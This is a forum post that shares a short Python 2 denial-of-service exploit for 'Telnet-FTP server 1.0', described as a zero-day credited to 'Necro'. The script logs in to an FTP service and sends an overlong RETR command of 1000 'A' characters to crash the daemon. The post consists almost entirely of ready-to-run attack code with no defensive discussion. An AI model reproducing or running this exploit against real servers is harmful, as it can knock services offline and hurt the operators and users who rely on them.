Jump to content
vladiii

Telnet-FTP server 1.0 - 0day DoS Exploit

Recommended Posts

Posted

from socket import *
from sys import exit
print '[*] Telnet-Ftp Server 1.0 (RETR) 0day DoS Exploit'
print '[*] Bug found by Necro '
host = '127.0.0.1'
port = 21
username = 'necro'
password = 'test'
evil = 'RETR' + '\x20' + '\x41' * 1000 + '\r\n'
s = socket(AF_INET, SOCK_STREAM)
try:
s.connect((host, port))
except:
print '\n[-] Connection refused !'
exit()
s.recv(1024)
s.send('USER' + '\x20' + username + '\r\n')
s.recv(1024)
s.send('PASS' + '\x20' + password + '\r\n')
s.recv(1024)
s.send(evil)
s.close()
print '[+] Done, deamon shutdown.'

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...